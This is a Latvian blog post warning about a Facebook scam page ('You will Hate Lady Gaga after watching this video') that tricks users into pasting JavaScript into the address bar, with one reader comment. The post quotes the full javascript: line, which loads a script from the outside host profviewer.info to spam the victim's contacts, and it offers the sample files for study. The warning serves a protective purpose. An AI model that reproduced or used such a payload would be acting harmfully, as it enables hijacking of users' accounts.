Uzmanās no facebook.com Lady Gaga hacka

Šodien fb čatā no drauga saņēmu ziņu:

Ņemot vērā, ka šāds likās gana aizdomīgs, pievērsu uzmanību un izmēģināju līdz galam.

Atverot saiti atveras facebook.com lapa: http://www.facebook.com/pages/You-will-Hate-Lady-Gaga-after-watching-this-video/240965975962567

.

Un pēc tam – nospiežot uz CONTINUE, parādās viltīga instrukcija:

Un patiešām – izpildot šādu procesu adrešu joslā iekopēsies Javascirpt pieprasījums! 🙂

javascript:(a=(b=document).createElement(‘script’)).src=
‘http://profviewer.info/new.js’,b.body.appendChild(a);void(0)

 

Atliek tikai nospiest ENTER un “laikam” visiem jūsu kontaktiem nosūtīsies privāts ziņojums ar sākumā minēto tekstu.
Man necēlās roka to izmēģināt, bet ticot draugam, kuram tieši tā arī notika 🙂 iesaku pārējiem uzmanīties.

Pielikumā arī .swf un .js failiņi, kam ir interese papētīt! 🙂

Flash .swf un .js faili

 

 

 

Arnis

 

One thought on “Uzmanās no facebook.com Lady Gaga hacka

  1. Kruti, tas strādā līdzīgi kā XSS injekcija, tikai tas ir nevis caurums, bet vienkārši ķer cilvēkus uz muļķi.

    Līdzīgā veidā varētu arī zagt profilus, aizņemoties e-pastu un nomainot paroli.

    Vienīgais, ko Facebook šajā sakarā var iesākt – dzēst šādas aplikācijas cik ātri iespējams. Ja ieviestu aplikācijas čekošanu pirms apstiprināšanas, tad uz aplikācijas apstiprināšanu varētu nākties gaidīt ļoti ilgi. Nekādu citu risinājumu tā ātrumā iedomāties nevaru.

Atbildēt

Jūsu e-pasta adrese netiks publicēta.